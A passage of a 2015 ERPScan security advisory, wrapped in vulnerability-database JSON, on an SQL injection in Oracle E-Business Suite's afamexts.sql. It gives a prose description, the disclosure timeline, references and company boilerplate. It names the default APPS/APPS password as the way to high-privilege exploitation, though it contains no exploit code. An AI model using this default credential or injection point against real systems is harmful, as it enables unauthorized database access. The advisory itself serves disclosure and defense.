Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
